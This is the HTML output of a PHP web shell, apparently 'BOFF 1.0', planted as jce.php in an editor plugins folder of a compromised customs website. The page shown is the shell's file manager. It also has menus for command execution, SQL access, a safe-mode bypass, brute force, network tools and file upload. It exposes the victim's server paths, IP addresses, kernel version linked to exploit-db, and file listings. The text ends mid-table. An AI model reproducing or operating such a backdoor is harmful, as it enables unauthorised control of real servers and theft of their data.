onclick="g(&quot;FilesMan&quot;,&quot;/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/&quot;)">spbrta/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/&quot;)">plugins/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/&quot;)">editors/</a> <font color="#25ff00">drwxrwxr-x</font> <a href="#" onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors','','','')">[ home ]</a><br></td><td width="1" align="right"><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8">UTF-8</option><option value="Windows-1251" selected="">Windows-1251</option><option value="KOI8-R">KOI8-R</option><option value="KOI8-U">KOI8-U</option><option value="cp866">cp866</option></optgroup></select><br><span>Server IP:</span><br>172.16.0.2<br><span>Client IP:</span><br>105.112.180.164</nobr></td></tr></tbody></table><table style="border-top:2px solid #333;" cellpadding="3" cellspacing="0" width="100%"><tbody><tr><th width="10%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="10%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="10%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="10%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="10%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="10%">[ <a href="#" onclick="g('SafeMode',null,'','','')">Safe mode</a> ]</th><th width="10%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="10%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="10%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="10%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></tbody></table><div style="margin:5"><h1>File manager</h1><div class="content"><script>p1_=p2_=p3_="";</script><script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width="100%" class="main" cellspacing="0" cellpadding="2">
<form name="files" method="post"></form><tbody><tr><th width="13px"><input type="checkbox" onclick="sa()" class="chkbx"></th><th><a href="#" onclick="g(&quot;FilesMan&quot;,null,&quot;s_name_0&quot;)">Name</a></th><th><a href="#" onclick="g(&quot;FilesMan&quot;,null,&quot;s_size_0&quot;)">Size</a></th><th><a href="#" onclick="g(&quot;FilesMan&quot;,null,&quot;s_modify_0&quot;)">Modify</a></th><th>Owner/Group</th><th><a href="#" onclick="g(&quot;FilesMan&quot;,null,&quot;s_perms_0&quot;)">Permissions</a></th><th>Actions</th></tr><tr><td><input type="checkbox" name="f[]" value=".." class="chkbx"></td><td><a href="#" onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/..');" title=""><b>[ .. ]</b></a></td><td>dir</td><td>2017-04-20 14:25:37</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'..','chmod')"><font color="#25ff00">drwxrwx---</font></a></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="jce" class="chkbx"></td><td><a href="#" onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/jce');" title=""><b>[ jce ]</b></a></td><td>dir</td><td>2022-01-18 22:46:10</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'jce','chmod')"><font color="#25ff00">drwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'jce', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce', 'touch')">T</a></td></tr><tr><td><input type="checkbox" name="f[]" value="jck" class="chkbx"></td><td><a href="#" onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/jck');" title=""><b>[ jck ]</b></a></td><td>dir</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'jck','chmod')"><font color="#25ff00">drwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'jck', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck', 'touch')">T</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="nab" class="chkbx"></td><td><a href="#" onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/nab');" title=""><b>[ nab ]</b></a></td><td>dir</td><td>2018-11-08 23:21:27</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'nab','chmod')"><font color="#25ff00">drwxr-xr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'nab', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'nab', 'touch')">T</a></td></tr><tr><td><input type="checkbox" name="f[]" value="tinymce" class="chkbx"></td><td><a href="#" onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/tinymce');" title=""><b>[ tinymce ]</b></a></td><td>dir</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'tinymce','chmod')"><font color="#25ff00">drwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'tinymce', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce', 'touch')">T</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="xstandard" class="chkbx"></td><td><a href="#" onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/xstandard');" title=""><b>[ xstandard ]</b></a></td><td>dir</td><td>2019-06-09 07:42:20</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'xstandard','chmod')"><font color="#25ff00">drwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'xstandard', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard', 'touch')">T</a></td></tr><tr><td><input type="checkbox" name="f[]" value="adminsigning.zip" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'view')">adminsigning.zip</a></td><td>370.55 KB</td><td>2018-04-19 08:57:45</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'adminsigning.zip','chmod')"><font color="#25ff00">-rw-r--r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="home.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'home.php', 'view')">home.php</a></td><td>285 B</td><td>2019-01-05 03:01:48</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'home.php','chmod')"><font color="#25ff00">-rw-r--r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'home.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="index.html" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'index.html', 'view')">index.html</a></td><td>44 B</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'index.html','chmod')"><font color="#25ff00">-rwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'index.html', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="jce.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'jce.php', 'view')">jce.php</a></td><td>25.47 KB</td><td>2018-01-09 18:19:01</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'jce.php','chmod')"><font color="#25ff00">-rw-rwxr--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'jce.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="jce.xml" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'jce.xml', 'view')">jce.xml</a></td><td>29.97 KB</td><td>2014-03-25 13:50:01</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'jce.xml','chmod')"><font color="#25ff00">-rw-rwxr--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'jce.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="jck.js.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'jck.js.php', 'view')">jck.js.php</a></td><td>5.28 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'jck.js.php','chmod')"><font color="#25ff00">-rwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'jck.js.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="jck.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'jck.php', 'view')">jck.php</a></td><td>21.79 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'jck.php','chmod')"><font color="#25ff00">-rwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'jck.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="jckstyles.xml.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'view')">jckstyles.xml.php</a></td><td>3.72 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php','chmod')"><font color="#25ff00">-rwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="jcktemplates.xml.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'view')">jcktemplates.xml.php</a></td><td>2.62 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php','chmod')"><font color="#25ff00">-rwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="midd.png" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'midd.png', 'view')">midd.png</a></td><td>796.23 KB</td><td>2018-03-27 02:54:12</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'midd.png','chmod')"><font color="#25ff00">-rw-r--r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'midd.png', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="none.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'none.php', 'view')">none.php</a></td><td>53.63 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'none.php','chmod')"><font color="#25ff00">-rwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'none.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="none.xml" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'none.xml', 'view')">none.xml</a></td><td>573 B</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'none.xml','chmod')"><font color="#25ff00">-rwxrwxr-x</font></a></td><td><a href="#" onclick="g('FilesTools',null,'none.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="office.zip" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'office.zip', 'view')">office.zip</a></td><td>1.38 MB</td><td>2018-11-19 13:48:12</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'office.zip','chmod')"><font color="#25ff00">-rw-r--r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'office.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="tinymce.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'tinymce.php', 'view')">tinymce.php</a></td><td>20.95 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'tinymce.php','chmod')"><font color="#25ff00">-rw-rwxr--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'tinymce.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="tinymce.xml" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'view')">tinymce.xml</a></td><td>10.19 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'tinymce.xml','chmod')"><font color="#25ff00">-rw-rwxr--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="TSB.zip" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'TSB.zip', 'view')">TSB.zip</a></td><td>871.25 KB</td><td>2021-01-18 10:31:40</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'TSB.zip','chmod')"><font color="#25ff00">-rw-r--r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'TSB.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="wellss.zip" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'wellss.zip', 'view')">wellss.zip</a></td><td>1.13 MB</td><td>2021-01-20 15:52:36</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'wellss.zip','chmod')"><font color="#25ff00">-rw-r--r--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'wellss.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'download')">D</a></td></tr><tr class="l1"><td><input type="checkbox" name="f[]" value="xstandard.php" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'xstandard.php', 'view')">xstandard.php</a></td><td>148.11 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'xstandard.php','chmod')"><font color="#25ff00">-rw-rwxr--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'xstandard.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'download')">D</a></td></tr><tr><td><input type="checkbox" name="f[]" value="xstandard.xml" class="chkbx"></td><td><a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'view')">xstandard.xml</a></td><td>1.10 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href="#" onclick="g('FilesTools',null,'xstandard.xml','chmod')"><font color="#25ff00">-rw-rwxr--</font></a></td><td><a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'download')">D</a></td></tr><tr><td colspan="7">
	<input type="hidden" name="a" value="FilesMan">
	<input type="hidden" name="c" value="/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/">
	<input type="hidden" name="charset" value="Windows-1251">
	<select name="p1"><option value="copy">Copy</option><option value="move">Move</option><option value="delete">Delete</option><option value="zip">Compress (zip)</option><option value="unzip">Uncompress (zip)</option><option value="tar">Compress (tar.gz)</option></select>&nbsp;<input type="submit" value=">>"></td></tr></tbody></table></div>
</div>
<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%" style="border-top:2px solid #333;border-bottom:2px solid #333;">
	<tbody><tr>
		<td><form onsubmit="g(null,this.c.value,&quot;&quot;);return false;"><span>Change dir:</span><br><input class="toolsInp" type="text" name="c" value="/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/"><input type="submit" value=">>"></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type="text" name="f"><input type="submit" value=">>"></form></td>
	</tr><tr>
		<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color="#25ff00">(Writeable)</font><br><input class="toolsInp" type="text" name="d"><input type="submit" value=">>"></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color="#25ff00">(Writeable)</font><br><input class="toolsInp" type="text" name="f"><input type="submit" value=">>"></form></td>
	</tr><tr>
		<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type="text" name="c" value=""><input type="submit" value=">>"></form></td>
		<td><form method="post" enctype="multipart/form-data">
		<input type="hidden" name="a" value="FilesMAn">
		<input type="hidden" name="c" value="/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/">
		<input type="hidden" name="p1" value="uploadFile">
		<input type="hidden" name="charset" value="Windows-1251">
		<span>Upload file:</span> <font color="#25ff00">(Writeable)</font><br><input class="toolsInp" type="file" name="f"><input type="submit" value=">>"></form><br></td>
	</tr></tbody></table></div></body></html>

Original PHP code

          <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>spbrta.customs.ru - BOFF 1.0</title>
<style>
body{background-color:#000028;color:#e1e1e1;}
body,td,th{ border:1px outset black;font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ border-left:5px solid #df5;color:#fff;background-color:#000028; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:7px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#000028;margin:0px; }
div.content{ padding: 7px;margin-left:7px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#003300;}
.main tr:hover{border:2px outset gray;;background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/';
    var a_ = 'FilesMan'
    var charset_ = 'Windows-1251';
    var p1_ = '';
    var p2_ = '';
    var p3_ = '';
    var d = document;
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
		sr('/spbrta//plugins/editors/jce.php', params);
	}
	function sr(url, params) {	
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux web.master.customs.ru 2.6.32-504.23.4.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 UTC 2015 x86_64 <a href="http://exploit-db.com/list.php?description=Linux+Kernel+2.6.32" target=_blank>[exploit-db.com]</a></nobr><br>48 ( apache ) <span>Group:</span> 48 ( ? )<br>5.3.3 <span>Safe mode:</span> <font color=#00bb00><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2022-01-19 01:02:45<br>393.59 GB <span>Free:</span> 77.88 GB (19%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/var/")'>var/</a><a href='#' onclick='g("FilesMan","/var/www/")'>www/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/")'>customs.rbc.ru/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/")'>spbrta/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/htdocs/")'>htdocs/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/")'>spbrta/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/")'>plugins/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/")'>editors/</a> <font color=#25ff00>drwxrwxr-x</font> <a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br>172.16.0.2<br><span>Client IP:</span><br>105.112.180.164</nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="10%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="10%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="10%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="10%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="10%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="10%">[ <a href="#" onclick="g('SafeMode',null,'','','')">Safe mode</a> ]</th><th width="10%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="10%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="10%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="10%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/..');" title=><b>[ .. ]</b></a></td><td>dir</td><td>2017-04-20 14:25:37</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=#25ff00>drwxrwx---</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jce" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/jce');" title=><b>[ jce ]</b></a></td><td>dir</td><td>2022-01-18 22:46:10</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jce','chmod')"><font color=#25ff00>drwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jce', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="jck" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/jck');" title=><b>[ jck ]</b></a></td><td>dir</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jck','chmod')"><font color=#25ff00>drwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jck', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="nab" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/nab');" title=><b>[ nab ]</b></a></td><td>dir</td><td>2018-11-08 